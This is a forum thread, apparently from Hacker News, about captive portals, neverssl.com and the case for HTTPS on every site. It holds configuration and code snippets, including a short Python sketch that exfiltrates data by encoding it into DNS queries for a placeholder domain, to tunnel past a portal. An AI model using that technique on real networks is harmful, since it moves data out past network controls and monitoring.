When I'm on free airport wifi, they'll often limit the session to half an hour and then start MITMing your traffic to bounce you back out to the sign-in page so you agree to the terms and conditions again. When that happens, the redirect won't work if you're trying to browse to an HTTPS URL. Worse, for many sites you can't tell your browser to "just go along with the MITM" because of HSTS.
So in airports I rack my brain for a website that might serve content over HTTP, not HTTPS. Alas, they're getting harder to find, and it's getting harder to keep those airport wifi sessions going. I half considered registering "alwaysinsecure.com" or "alwayshttp.com" so I could reliably find one... Now I'll probably just use qq.com, it's short and easy to remember.
Interesting. What's the prescription here: simply use http://neverssl.com to see whether you need to re-authenticate to the captive portal? Is that correct?
It's not a technical or even a standards-setting problem. IIRC there's already an RFC for a DHCP-announced login webpage (RFC 7710). It's business and legal: layer 8 and 9 problems.
Operating system maintainers have added captive portal detection (CPD) to improve user experience. Hotspot owners often sabotage captive portal detection by whitelisting Apple's and Google's CPD URLs! AAPL & GOOG have to change these URLs periodically, and 802.11 vendors add the new ones, in a cat-and-mouse game. So the customer's phone, and thus the customer, think they're connected, but they end up hitting a CP anyway. Why do owners do this? Because the CPD browser will close immediately upon receiving unencumbered Internet access. While many owners just want the legal-liability-limiting "I Agree" button to be tapped, many others want customers to see their store promotion/ad flyer page for longer than a second, place a tracking cookie, and do other value-adds.
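For context, CPD works by fetching a known probe URL and checking for a canned answer. A minimal sketch of the idea in Python, using Google's well-known generate_204 endpoint (an intercepting portal will answer with its own page instead of an empty 204):

    import urllib.request

    # Probe a URL whose expected answer is a bodyless HTTP 204. A captive
    # portal that intercepts the request answers 200/302 with its own page,
    # which is exactly what OS-level CPD looks for.
    PROBE = "http://connectivitycheck.gstatic.com/generate_204"

    resp = urllib.request.urlopen(PROBE, timeout=5)
    print("open internet" if resp.getcode() == 204 else "captive portal suspected")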
The interests of Wi-Fi network operators and users are not aligned. Right now only equipment manufacturers directly profit off Wi-Fi service. Hotspot owners can only indirectly earn money through attracting more hotel guests, cafe customers, etc. Some now harvest customer MAC address and in-store walking behavior. Ideally hotspot owners could receive a revenue share for offloading traffic from LTE, which would give them an incentive to be more loyal to users and maintain quality of experience.
I use example.org for that. I wouldn't be surprised if it has to stay available on http for hysterical raisins, such as everyone using it in their tests and outage detectors.
Almost all? You've had access to some pretty crappy captive portals.
In my experience most portals' firewalls block all traffic (at IP level) except ports 80 and 443, which are transparently redirected to their auth server. Tunnelling isn't an option because you just can't contact anything else.
And it's not like I'm describing something that's hard to do. You've been able to script this stuff in iptables forever.
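For illustration, a rough sketch of such a pre-auth ruleset (the interface name, the portal address 10.0.0.1, and the client MAC are all made up):

    # Redirect all pre-auth HTTP and DNS from clients to the portal box.
    iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:80
    iptables -t nat -A PREROUTING -i wlan0 -p udp --dport 53 -j DNAT --to-destination 10.0.0.1:53
    # Allow traffic to the portal itself, drop everything else.
    iptables -A FORWARD -i wlan0 -d 10.0.0.1 -j ACCEPT
    iptables -A FORWARD -i wlan0 -j DROP
    # After login, punch a per-client hole ahead of the catch-all rules.
    iptables -t nat -I PREROUTING -i wlan0 -m mac --mac-source 00:11:22:33:44:55 -j ACCEPT
    iptables -I FORWARD -i wlan0 -m mac --mac-source 00:11:22:33:44:55 -j ACCEPT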
Then how can they redirect you to anything in the first place? I type www.google.com in my browser and then what exactly happens next on the IP level? Think about it...
Sure, yup, oversimplifying to make the point. They are also transparently redirecting DNS to their own server.
My point is you can't "tunnel" out. Not for DNS, VPN or whatever. It's all blocked. The only services they let you access are their own, to get you to authenticate. Even if you walked in with a complete hosts file (so you didn't need to query any DNS server), you'd still not be allowed to connect, at the firewall level, until you authenticated.
> It could reply with anything, even a valid, correct response.
Which you actually need to do, to prevent locking the user out from the website they tried to access in the first place after authenticating, thanks to DNS pinning.
> The connection you make to that result is still going to be redirected to the portal.
Correct, but who cares? This is about DNS tunneling, there will be no connection anywhere, the DNS queries and their replies ARE the connection, so to say. How about reading up on what a DNS tunnel actually is? Considering your posts in this thread you have no clue how it works or at least have huge misconceptions about it.
Two ways of doing DNS tunneling:
1. The direct way: you talk to your server straight over port 53.
2. The indirect way: you tunnel through a domain that you own, making the local network's DNS resolver relay your queries to your server.
For 1, the port isn't open very often, indeed. But 2 I see open all the time, even in banks... (see the sketch below)
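To make point 2 concrete, here is a toy upstream-only sketch in Python: the payload rides inside the queried hostname, and the venue's own resolver relays it to the authoritative server for a domain you control ("tunnel.example.com" is a placeholder; real tools like iodine also carry a downstream channel in TXT/NULL answers):

    import base64
    import socket

    def exfiltrate(data: bytes) -> None:
        # Encode the payload as a DNS-safe label (max 63 chars per label).
        label = base64.b32encode(data).decode().rstrip("=").lower()
        try:
            # The local resolver recursively forwards this A query to the
            # authoritative server for tunnel.example.com -- your server.
            socket.gethostbyname(label + ".tunnel.example.com")
        except socket.gaierror:
            pass  # the answer is irrelevant; the query itself carried the data

    exfiltrate(b"hello")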
What are you tunnelling to? In a proper captive portal, it's blocked.
I'm not talking about just blocking DNS. Or just blocking known DNS services. A good captive portal just denies everything save the web/DNS traffic redirected to an internal server running on the portal. That is, until you log in and get explicit allow rights.
If your portal isn't doing this, if you can escape and actually connect to external IPs, it's not captive.
They can't do that. If they reply with a bogus IP, then after you authenticate to the CP you cannot access the website you tried to access in the first place (e.g. Google), because your browser has now cached the wrong IP address that it got earlier.
So they need to look up the actual IP address on your behalf and then in turn redirect traffic to that IP to their CP. Boom: you just managed to communicate with the outside world.
No they couldn't, unless they expect everyone to use a browser that is vulnerable to DNS rebind attacks, which probably means some browser from the 90s.
Every browser is vulnerable to DNS rebind attacks, since the burden of "fixing" it has been pushed onto the applications that are getting traffic forwarded by the browser.
Also, services like Cloudflare wouldn't work if low TTLs didn't work. CF rotates IPs often as part of its DDoS protection.
They still do. Not like when DNS rebinding was all the rage, when Firefox decided to cache DNS replies forever, but they still bump the TTL to a minimum of several minutes, which is enough to confuse people in the CP scenario. I wouldn't be surprised if some OS resolvers did the same, possibly just for performance reasons. And that's all fine and dandy, since those couple of minutes don't break the Cloudflare scenario.
I mean, if that weren't the case, why would CPs work the way they do anyway? It wouldn't be an issue to have a DNS server in the mix that resolves everything to your CP address with a TTL of one second, and then, in addition to your port 80 TCP redirect, just add another one for UDP 53. Yet it's not being done by any CP solution I have ever encountered.
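For what it's worth, the setup described here is trivial with e.g. dnsmasq (the portal address is hypothetical):

    # dnsmasq.conf sketch: answer every query with the portal's address,
    # with a short TTL so clients re-resolve right after authenticating.
    address=/#/10.0.0.1
    local-ttl=1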
www.com is a short, easy to remember, parked domain I tend to use. It has some text ads, but is probably reasonably light on bandwidth.
neverssl.com, mentioned below, is one whose name I somehow always struggle to remember when I need it. I end up typing things like nossl.com or neverhttps.com and such...
For a long time I used my bank's homepage to get redirected to the login page. Until they (reluctantly) forced HTTPS. Since then I'm using http://neverssl.com :)
I have public content that I'm willing to share over the web. To offer it over HTTP, I only need a few thousand lines of code on top of TCP. It's realistic to prove that that code has no memory-safety problems. To offer it over HTTPS, I need to add tens of thousands of lines of extra code related to cryptography. No existing implementation is known to be correct. The popular implementations don't have a strong history of code quality. It's completely reasonable to expect that, over time, new vulnerabilities will be found that will allow attackers to read or write to unintended memory locations on my server.
I totally understand that, by adding a popular but historically unsafe cryptography implementation, I can help web clients to avoid MITM shenanigans while reading my content. MITM indeed is a problem. But I'm not willing to make that my problem. The vast majority of my customers don't experience MITM data modification while reading my content. The vast majority of my customers wouldn't care if the whole world knew that they have read my content.
Perhaps in the future, code for all the required cryptography layers will be just as provably correct as code for reading the cleartext HTTP protocol. When that day comes, I will add HTTPS. Not before.
I can't understand this opinion. So what if it only negatively affects a few users? How do you feel about ML that produces problematic results for a portion of users? Security is correctness.
> you saying that since HTTPS isn’t perfectly secure you’re gonna use the definitely insecure HTTP? What kind of logic is that?
Different sort of security. While I don't agree with OP, the logic here is somewhat sound: he is concerned about threats against the server. It is reasonable to claim that TLS increases the attack surface, because any vulns in the TLS implementation would be purely additive to the potential vulns in the HTTP server.
HTTPS worst case: you yourself are harmed (e.g., if someone finds a zero-day in a cryptography library and uses it to run arbitrary code on your server)
Yeah, because nobody has ever found RCE bugs in other parts of the HTTP server infra. The only way people get RCE on your box is by exploiting TLS libs. Right.
HTTP is simple enough I can literally create a barebones semi-compliant HTTP server from scratch. If all it has to do is serve some static pages, I can do this in ~1000 lines or less. I don't need any infrastructure beyond basic TCP/IP. Can't say the same about HTTPS.
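To illustrate the scale (a toy sketch in Python rather than C, and only semi-compliant, as claimed; DOCROOT is a hypothetical directory of static pages):

    import os
    import socket

    DOCROOT = "./public"  # hypothetical directory of static pages

    # Bare-bones HTTP/1.0 static server: read the request line, map the
    # path under DOCROOT, send the file or a 404.
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("", 8080))
    srv.listen(5)
    while True:
        conn, _ = srv.accept()
        try:
            request = conn.recv(4096).decode("latin-1")
            path = request.split(" ")[1] if " " in request else "/"
            if path.endswith("/"):
                path += "index.html"
            full = os.path.realpath(os.path.join(DOCROOT, path.lstrip("/")))
            # Refuse paths that escape DOCROOT, and anything that isn't a file.
            if full.startswith(os.path.realpath(DOCROOT)) and os.path.isfile(full):
                with open(full, "rb") as f:
                    body = f.read()
                conn.sendall(b"HTTP/1.0 200 OK\r\nContent-Length: %d\r\n\r\n" % len(body) + body)
            else:
                conn.sendall(b"HTTP/1.0 404 Not Found\r\n\r\n")
        finally:
            conn.close()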
I'd say you should be counting the lines of code needed to implement TCP/IP – as well as DHCP, ARP, Ethernet, maybe DNS, and anything else I've forgotten that your server needs to speak. Consider lwIP, the most common implementation of those protocols on microcontrollers: it's meant to be minimalistic, but it's still some ~35,000 SLoC, not including tests. For comparison, a minimalistic implementation of TLS is Amazon's s2n, which is ~12,000 SLoC. Adding s2n to lwIP would only represent an increase in code size of about one third.
Of course, a more typical HTTP/HTTPS server will be using the Linux kernel for networking (with some userland bits for DHCP and DNS), and OpenSSL for TLS – overall representing multiple orders of magnitude more code. But I suspect the proportion between TLS and non-TLS would be somewhere in the same ballpark, depending on how you count.
The problem is that on Linux, the TCP/IP stack is in-kernel, universal for everything on the system, and overall unobtrusive – it mostly 'just works' – while OpenSSL is in userland, has an unwieldy API and unstable ABI, can be linked in many different ways, requires a lot of configuration, and is overall a pain in the neck. So as a developer, the complexity of TLS weighs heavily on you, while the complexity of TCP/IP is something you can largely forget about.
Personally, I think TLS adoption would have been quicker if it had been implemented in the kernel and it just became a switch you could flip in the socket API; something like:
socket(AF_INET, SOCK_STREAM, PF_TLS)
But for better or worse, that's not how things panned out.
An option is to write your own web server and have the likes of Cloudflare provide TLS (and a bunch of other stuff!) on top of it for free. Best of both worlds.
>The vast majority of my customers don't experience MITM data modification while reading my content.
[citation needed]. You have no idea if that is the case or not. Too many ISPs inject ads, javascript, or other horrible technologies (Flash) into customers' HTTP streams.
Users have no idea if what you are serving them is what they are receiving. If it's content like code samples, it can be corrupted by malicious actors. If it's political content, the message can be altered.
<hyperbolic>I mean, we all know rurcliped is a Nazi, their website said so the other day. </hyperbolic>
It's worth noting that HTTP->HTTPS redirect is, in some sense, game-over already. A malicious actor upstream can mitm by blocking the redirect and providing an HTTP version to the client while communicating HTTPS to the server. sslstrip is one implementation.
A quick solution that solves many cases is to also use HTTP Strict Transport Security (HSTS), and declare it for at least a year. Then once the user visits the site (say from home) and gets the HSTS header, later visits in that time will always use HTTPS. This solves the problem in many cases.
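Concretely, HSTS is a single response header served over HTTPS. In nginx, for instance, a one-year declaration looks like this:

    # 31536000 seconds = one year; sent on every HTTPS response.
    add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;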
The best solution is to get your site into the HSTS preload list. You can do that here: https://hstspreload.org/ - this adds the site to the Chrome list, and most other major browsers (Firefox, Opera, Safari, IE 11 and Edge) have an HSTS preload list based on the Chrome list. Once that happens and the browser updates, users will always use https, even if they ask for http.
That's why HSTS preloading is what you want to achieve. We've recently added openstreetmap.org and it was a fun project to make sure that everything would properly reply over https.
This is also why it's preferable to use TLS-only ports for SMTP (465) and IMAP (993) instead of using the STARTTLS protocol extensions. Mail clients aren't required to enforce STARTTLS and might fall back to plaintext when a MITM blocks the extension.
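The difference is easy to poke at with openssl s_client (the hostname is hypothetical): the first connection is TLS from the very first byte, while the second starts in plaintext and upgrades, and that upgrade is exactly the step a MITM can strip:

    # Implicit TLS: the handshake happens before any SMTP commands.
    openssl s_client -connect mail.example.com:465
    # STARTTLS: plaintext SMTP first, then an in-protocol upgrade.
    openssl s_client -connect mail.example.com:587 -starttls smtp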
Indeed the HTTP -> HTTPS redirect is only the first step in solving the problem.
A 301 redirect will offer some lasting protection as it can be cached but it's not really that great. The goal here is to take the first step to get on HTTPS and then longer term the sites can consider HSTS and eventually preloading.
The 'web' is kind of for the commons, but HTTPS is just a few steps away from being 'easy'. The steps required are frankly just a little too weird and ugly.
Most people making web sites, even many devs, don't necessarily want to deal with SSL, or don't have the wherewithal to.
Setting up SSL on AWS recently was a monster pain in the rear for our little nothing project site; granted, a lot of that was AWS-oriented.
It needs to be easier, if it were easy, everyone would be doing it.
> many devs, don't [...] have the wherewithal to deal with SSL.
I can buy this for a non-dev clicking "Install Wordpress" in a legacy cpanel of a cheap shared web host (though in that case the web host should be setting up certs automatically for them), but what exactly is complicated about setting up certs for a dev? https://certbot.eff.org/ holds your hand through the entire ~30 second process. It's simpler than most other tasks a dev needs to do while setting up a website.
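For the common case it really is roughly one command (assuming certbot is installed and the domain already points at the machine):

    # Obtains a Let's Encrypt certificate and edits the nginx config to use it.
    sudo certbot --nginx -d example.com -d www.example.com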
Sometimes it comes down to whether user-generated content with externally linked resources is allowed on the site. E.g. forums often allows embedding images by users and because users don't care about HTTP or HTTPS and only copy the image link from somewhere, you will end up with "mixed content" warnings and broken "locks" in the browser address bar all over the place.
The current alternative is to simply use HTTP, which doesn't yield any warnings. When Chrome starts marking all non-HTTPS sites as insecure, this will hopefully change.
certbot has failed continually on my DO instance. It cannot update my cert from cron. I have to manually update my cert when I remember to do so. In fact, I had forgotten to do this for the last several months, so my site gets to display a nice scary warning for anyone who might venture forth and try https. I've searched for how to fix it and nothing comes up. The site is static HTML and I've considered just removing https.
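For reference, the intended steady state is just a scheduled `certbot renew`; when that fails silently, running it by hand usually surfaces the actual error. (The hook and service name below are assumptions for a typical nginx box.)

    # Typical crontab entry: try renewal twice daily, reload nginx on success.
    0 3,15 * * * certbot renew --quiet --deploy-hook "systemctl reload nginx"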
I use a cheap shared web host. My current and previous host both have LetsEncrypt implementations that take a couple of clicks. The former one was just default cpanel I think.
It is difficult if you want to understand the process, though no more so than, say, using Git IMO.
In short, cpanel and other shared-host panels make it as easy as the clicky-clicky Wordpress install.
I agree, I found that comparison a bit odd. Certbot is many many orders of magnitude easier to use than Git, and that's even if you need to "use" it beyond the run-once-and-forget standard use-case
>but what exactly is complicated about setting up certs for a dev?
Seeing as how he mentioned AWS, it's a bit more complicated if you have a cluster of servers that are automatically managed. You have to set up a reverse proxy and integrate that into your cloud provider's workflow.
ACM combined with the various other services you need, especially Route53 or whatever, plus their byzantine new networking and security rules ... means you need to read a few sections of several different manuals to just do basic things.
AWS has become very complex over the last few years - there was a period where you didn't need admins. Now it seems you do again, just cloud admins, not local machine admins.
Our accuracy rate is currently around 99.6%, so we're doing pretty well, but of course I don't think it can ever be 100% either.
The biggest thing we've come across so far is geo-sensitive handling of requests. Some sites will redirect you to HTTPS or not based on where you are making the request from! This of course means you might see HTTPS and we see HTTP.
I think it's still fair to include those sites in this case because they aren't serving all traffic securely.
Hey, thanks for the extra insight, I do appreciate it. Interesting to know that those sites show these behaviours too. Why would a geolocation-based redirect be interesting for a site?
My guess would be that maybe sites have different infrastructure in different regions and maybe they aren't completely aligned on their progress. I really don't know why you'd intentionally have it like that.
I thought about country restrictions as well. I noticed most of the offending websites were in China. Wondering if having SSL there is not allowed or something.
It doesn't work every time for me. If I open it in a new private session (Chrome or Firefox) there is no redirection... Probably a faulty configuration on their side.
In Germany I thought it kind of sad that a major automotive forum isn't HTTPS-secured (motortalk.de). I was asking myself how they manage their users' logins.
Then I checked. They are secured. Not sure since when, but maybe the data from whynohttps isn't as fresh as one might think.
And a lot of bigger press sites (spiegel.de, faz.net, computerbild.de) still aren't secured. Kind of a shame imho.
The main reason for big media sites and forums not being https secured is the interest of the advertising community. There was a huge community discussion on sites like golem.de and Heise.de, which only recently switched to https. Login pages are protected almost all the time.
The site I was debugging was a WordPress site that had somehow gotten the images in its opening carousel set to http:// despite the fact that the "header" module had a default of https://. Very useful to just feed it the URL and notice these were the broken images; I could have grep'd through a "show source" page, but whynopadlock.com made it easy for me to identify that it was the header module of a site for which I had little familiarity.
bbc.com redirects to bbc.co.uk in the UK, which is served over HTTPS. They just flipped that switch a couple of months ago, so I'd assume that it won't be long before bbc.com is also HTTPS.
There is work underway to migrate bbc.com to HTTPS.
Most BBC sites in the UK have already been switched over the past few months. https://www.bbc.co.uk/news was finished about a month ago.
The BBC is a complicated beast and these sort of things take longer than you would think.
We redirect to http in the meantime to avoid having both versions indexed.
Note that the "Flexible SSL" and even the "Full SSL" options don't protect the traffic between your server and Cloudflare. You need to enable "Full SSL (strict)" as your SSL setting for that.
However, he is getting quite a sizable portion of all the security benefits on HTTPS even with the current setup. I think it's quite a bit better than plaintext http all the way. Troy Hunt has written well about this: https://www.troyhunt.com/cloudflare-ssl-and-unhealthy-securi...
You get a few benefits (protection against local interception), but it comes with a significant downside, as it takes away the ability for an end user to identify if the connection is actually secure. For example, I wouldn't enter my card details or other personal info on an HTTP site, but when CF is in front of it, I have no way of knowing if that's strict HTTPS to the origin or if most of the connection goes insecurely over the internet. The other problem is that CF makes it very easy for less technical website owners to click a button, see a green lock and assume everything is fine.
Unfortunately not. If you aren't setting up HTTPS at your origin then the connection still goes unencrypted over the internet. Full (Strict) is the only secure SSL option at Cloudflare.
Officially, many countries and businesses agree that Taiwan isn't a country, while continuing in practice to do everything that only makes sense if Taiwan is in fact a country. This is an old game that fools no one. I wouldn't fuss about the name, we all know what's really going on, and the name game probably saves millions of lives. You might find this video clip interesting:
It's not just the UN. Almost no country recognizes Taiwan as a sovereign state. No embassies in Taiwan. That is really weird, but that is the current diplomatic situation.
I think both Taiwan and China officially say Taiwan is a province. Where they disagree is over which government is the legitimate central government of China.
What's the point of encrypting the sites in China anyway? I mean, obviously everything you do online in China is tracked, and not only that but shared. So is it maybe better in China to just not encrypt, to save on the additional power consumption? Really good green policy in China :D
It's doing something. After Google deployed TLS and obviously did not obey government data requests, the government blocked Google domains entirely. Kind of like how Russia blocked Wikipedia entirely because TLS does not allow fine-grained per-page blocking.
I means it’s more about local corruption in China right which is driven by perverse economic pressures that come from an overbearing centerialized government power.
baidu and google.cn are high up on the list of non-HTTPS sites.
google.cn is an interesting one though: It redirects HTTPS to http, but the site consists of an image that redirects to google.com.hk which is https-only.
Who knows what you see in China when accessing google.cn...
Yes, but if you can MITM the http connection you can make the main site appear however you like. Including some login form or other way to obtain sensitive data.
...which is completely stupid because they score A+ on SSLlabs [0]. They even have HSTS etc., they really just have to preload it + add a 301 redirect.
You can figure out your own certs or manage the cert request/verification cycle via Let's Encrypt...or you can let someone else do it for you. I recently joined a company that offers HTTPS out of the box for any domain you own: https://blog.backplane.io/how-to-get-https-80e1b28b878c
I'm biased, but I do think it's a pretty painless way to enable HTTPS for sites both big and small. No uploading of certs, no modifications to your web app are necessary, it just works.
t.co is an unusual one. It's a link shortener that produces an https link if you give it an https link, or an http link if you give it an http link. At least I think that's how it worked but I'm having a hard time testing it now.
I expected less to be honest. The adult entertainment industry has been on a huge drive to encryption recently. It makes sense if you think about the content they serve, I guess people want more privacy there!
> I hate that I have to just because all you mofo's have forced me.
I can't empathize with this perspective.
"Encrypt every packet with strong cryptography" is the mission statement of the information security community ever since Edward Snowden went public.
The "mofos" have "forced" you to protect your users from attacks like QUANTUMINSERT.
The "mofos" have "forced" you to protect your users from abusive ISPs injecting advertisements that track them into web pages that gain no revenue from these ads.
The "mofos" have "forced" you to protect your users from being hit with increased malvertising and watering hole attacks because ISPs generally cannot secure their own systems.
I think the wins here far outweigh the temporary inconvenience of having to install/use certbot.
Why would strong encryption be necessary for a video game guide web-page? Say, one about Factorio?
Some game communities are toxic. E.g., Minecraft guides I'd host with https due to the threat of scumbags and hackers. But Factorio's community is incredibly lax and laid-back. So I would consider HTTPS to be a waste of effort and resources.
You're asking the wrong question, like many others who are resistant to HTTPS everywhere. HTTPS isn't for you, the site owner (although you gain the not insignificant benefit of knowing your content and traffic is untampered with). It's for the people that visit your site, so when you say HTTPS is a waste of effort and resources, what you're inadvertently saying is that you don't give a fuck about your visitors - or at least, not enough of one to do the least you can to protect them from people who want to track and/or tamper with their browsing activity[1]. Especially since solutions like Let's Encrypt with certbot are free and take a couple of commands to set up.
[1] Unencrypted, pretty much everything about your internet traffic is laid bare for any middleman - your ISP, the person who controls the router you're connected to, some script kiddie on the same network as you - to both read and write. Injecting ads or cryptominers, tracking what pages you visit, changing what a page says, even straight up serving a different page. Why let your site/server be a (potential) vehicle for exploitation, disinformation and privacy invasion?
If the user is so paranoid about this sort of stuff, then they can go get a VPS and control a large chunk of the network for themselves.
For everyone else, it's a game guide. The worst that can happen is that they get the wrong information about how Trains work in Factorio. There wouldn't be a need for me to track users or clicks or whatever in a hypothetical game guide community website.
As I stated before: I know some game communities (e.g. Minecraft or Eve Online) can be toxic. But the Factorio community isn't like that. So I'd be comfortable hosting a Factorio webpage under HTTP.
If I were hosting a Minecraft or Eve webpage however (warning: toxic community ahead), then I'd host it under HTTPS due to the dastards who troll and harass others in that community.
----------
That's the more important part btw: understanding your audience. Some game communities are toxic and full of harassers, trolls and so forth. But other communities are lax, friendly, and can get away with lesser amounts of security.
> If the user is so paranoid about this sort of stuff, then they can go get a VPS and control a large chunk of the network for themselves.
And the last mile is still going to be just as unencrypted, non-private, and tamperable as before.
You literally cannot get end-to-end encryption/privacy without the host supporting TLS.
It's really not an optional thing to support for you as an operator, and especially now that Let's Encrypt is a thing, there's really no excuse for not doing it.
(Now that we're on the subject of toxicity anyway: I'd say that depriving your users from the ability to secure their network traffic, just because you're trying to die on a weird hill, is pretty toxic behaviour.)
But some webpages are simple, static one-off projects that I put out on behalf of a community. I don't believe in ads and would rather pay for all the bandwidth that my users would use. Consider it a donation "for the love of the game".
Very, very simple, nearly static webpages, close to "neocities" level of web design. No users, no passwords, just information I'm publishing to help a game community out.
Nothing to steal, nothing to phish, nothing. Pure text, maybe a few images and videos to elaborate on specific points.
I understand that TLS is important for any website with interactivity, for privacy reasons. But the above webpage is completely static and non-interactive. It's old-school Web 1.0 stuff. There's nothing to steal, phish, or cheat here. Literally nothing.
I just don't see the point in HTTPS-ing this site.
I'm not sure why you aren't listening to other people. TANSTAASWS.
There ain't no such thing as a static website... When someone can MITM you, the simple page you serve them can have all your content with a complete redesign: scripts, login forms, anything the hacker chooses to put on it.
When you don't use HTTPS any middle man can take your content and do anything they want with it.
>Nothing to steal, nothing to phish, nothing. Pure text, maybe a few images and videos to elaborate on specific points.
So I was reading this site and am particularly concerned about the crypto miner present on the page. Care to explain this to me? Hint: it's a MITM due to the insecure context, and the miner isn't coming from the site itself, but as a user I'm going to blame the site, because it happens on the insecure site.
If you think a MITM can't do any harm with a static page then you simply aren't being creative enough.
> I understand that TLS is important for any website with interactivity for privacy reasons.
Then you understand wrong. It's important for any website, interactive or not, for privacy reasons. Reader privacy is a thing regardless of whether something is interactive. I don't know where you're getting the idea from that 'static' sites are somehow special.
I understand the importance of privacy in CERTAIN settings. Even if they're static.
For example, Eve Online would 100% be under HTTPS. Period. That online community is incredibly secretive, incredibly untrustworthy, full of scammers and requires every bit of security on EVERY webpage.
Factorio's community? Erm... no. Trolls just don't exist in that community. Unlike Eve Online, there's no warring factions of spies trying to take over each other's online turfs "outside of the game". Factorio is a lax community without any trolls or hackers.
A lot of it is understanding the userbase and general security posture. If I were a serious Eve Online player, I'd go for 100% secure settings, as much as possible, due to the shenanigans that community is known for pulling.
From my understanding, Eve Online gamers transcend the game itself and stalk your habits to the "real world" settings. Infiltrating forums and such. So yes, I'd expect Eve Online players (the serious ones at least) to be very privacy sensitive.
But ultimately, I don't think that this vague concept of "privacy" when applied to a game guide really matters. People normally don't shuffle books and anonymize themselves as they put books back onto the library cart for example.
And I'm old enough to remember physical library cards with the names of everyone who checked out a book. I don't recall any privacy concerns about that. But maybe I'm just old-skool or something.
-------------
With regards to malicious ISPs MITMing their users: they kinda control your DNS requests, so good luck with that. I'm not sure if there really is a way to fully secure against an ISP-level attack against the users.
An ISP can always inject into the HTTP -> HTTPS redirection and serve HTTP right there and then. HSTS assumes that the user has visited a clean version of your site before; if a new user comes in without ever having seen the HSTS header, then the ISP still "wins" and captures your users on a fake HTTP version of your site.
So no, the level of attacks you've described, I don't believe HTTPS solves the problem.
The worst that can happen is that malware JavaScript or phishing redirects are injected. Of course, if the page itself has ad networks, those are there by design.
Real story btw. I'm paying a bit of money for the host (not much though); I don't believe in ads taking money from the few reads I do get. It's basically a static page that costs pennies. I'm no longer updating the webpage, but I'm leaving it up just in case someone out there wants to learn more about the game. (It doesn't seem like any of the information is out of date. It's a few years old, but the game hasn't changed in this aspect, so the information is still solid.)
I just don't see any point converting this webpage into HTTPS.
Yes, I'm aware of MITM attacks and I'm also aware that fake certificates can be used to MITM even HTTPS sessions.
So I'm not convinced that HTTPS is the solution for that hypothetical attack. Not while untrustworthy certificate authorities are default-enabled on most clients anyway. At best, HTTPS complicates the attack but it doesn't make you immune to it.
A hypothetical MITM attacker can just get a fake certificate from a low-security vendor (ex: Comodo), and serve that to get a nice "trusted" version of the fake webpage. If you control the network, you control the certs that are eventually served to the users.
> At best, HTTPS complicates the attack but it doesn't make you immune to it.
That's literally all security. It isn't binary. It never is. At best, ASLR complicates ROP. At best, salts complicate breaking password hashes. At best, memory safe languages complicate buffer overflow attacks.
One could use your argument to dismiss basically all security. You've chosen zero mitm protection rather than a lot of mitm protection.
If you aren't using https then a network attacker with no preplanning can cause problems. If you are using https then a network attacker needs to get a bogus cert ahead of time. This costs money and time and does not scale well. Security is an economics issue. Making it more expensive to attack people is good.
Okay, I get what you're saying then. Your example isn't exactly the best example... but I "get" what you're trying to say at least.
You're saying that someone can inject a "redirect header" into a fake webpage, force that upon my users through the control of a network (WiFi router or whatnot), and use my domain name and my trust to take advantage of the users.
(Your example with the Zeus malware is bad because Zeus attacked the OS directly, so it wasn't a network attack. But hypothetically, let's say it was a network attack, so that it remains applicable to my example.)
Alas, HTTPS does NOT solve that, at least not while globally trusted HTTPS certificate roots remain insecure. They only need to get one HTTPS certificate signed by Comodo (or some other low-security HTTPS vendor) to attack my domain name in a manner like that.
That scam is mostly delivered through the ad-network vector, not MITM. Btw, it only references Zeus; it's not Zeus. A more subtle example is cryptocurrency miner scripts that result in your static page pegging a CPU core.
HTTPS raises the bar. There's no happily ever after in security. Maybe in five years domain hijacking and cert abuse will be as common as aforementioned fake tech support scams that prevent users from closing the tab. Some of them even set full-screen on desktop browsers and vibrate your phone (grr).
> That scam is mostly used through ad network vector not MITM.
Just one more reason why I'm not going to use ads to fund any web-projects I do.
-------
I agree that HTTPS raises the bar and makes certain scams more difficult. Indeed, I'd go as far as to say that any webpage with user-inputtable data (i.e. usernames, passwords, etc.) is required to be HTTPS. The risks are too great and that's the minimum security users expect these days.
But I'm still of the opinion that Web 1.0 style static sites can be served over HTTP just fine. If there are no usernames, no interactivity, and it's PURELY hosting static content in a community that's relatively lax (again: Minecraft and Eve Online fail this test. I'd use HTTPS even for a static site if I were doing Minecraft or Eve Online stuff), then I'd think HTTP is just fine.
> Christ you are ignorant about this kind of stuff.
Dude, I'm TRYING to have a discussion here. And frankly, I'm not fully convinced about the arguments that a lot of people are making here. Lobbing personal attacks is not cool, no matter the subject matter.
-----------
So hypothetically, you're saying a man-in-the-middle attack is going to change the content of my files. I understand.
Now tell me: how does HTTPS secure against that if Comodo certificates (or other poor-security certificate authorities) continue to exist?
A SINGLE bad certificate authority trusted by any of the major vendors would allow the attack you described to happen over HTTPS.
I have seen these things happen. HTTPS is not a magic cure-all, not while globally trusted bad CAs exist. Bad actors can still MITM HTTPS sites with a fake cert.
ISPs typically have some degree of HTTP proxying and caching available btw. You don't benefit from HTTP proxies / caches if you encrypt everything. So there's a reason. And if the bad actors can attack HTTPS with a MITM attack anyway, there's not much to gain from HTTPS from my viewpoint.
If a user goes to http://site.com, even if you have a redirector to the https://site.com version, the https version can be MITM'd with a self-signed certificate.
> If a user goes to http://site.com, even if you have a redirector to the https://site.com version, the https version can be MITM'd with a self-signed certificate.
At which point their browser will give them a big scary security warning.
ISPs and other network operators are notorious for injecting content into webpages [0]. Even if someone is doing this for "harmless" or even "benevolent" reasons, someone else is cryptocurrency mining, tracking, nefariously manipulating content, etc.
Because otherwise an ISP might insert ads, or some adversary changes the content and inserts malware. Also, as a consumer of your blog I want privacy, no need for ISP to know what I click on and read exactly. These are just a few reasons why.
> Also, as a consumer of your blog I want privacy, no need for ISP to know what I click on and read exactly.
In this hypothetical example, you're clicking on a video game guide. Someone watching you buy games from Gamestop would have more information than someone watching you click on "How Factorio Trains Work" or something else on this hypothetical example.
If the reverse DNS points to the IP address of the blog (i.e. people see that you're browsing "FactorioGuide.com"), they're gonna figure out that you're learning how to play the game Factorio in any case, even if all the traffic were encrypted.
The only way people don't know what you're doing is if the guide were on a shared host with many, many webpages on a single IP address. But otherwise, the typical website (i.e. self-hosted on a VPS) would have a unique IP address and a unique reverse-DNS entry. And people could figure out how long you've been browsing and what you've been looking at, even through HTTPS.
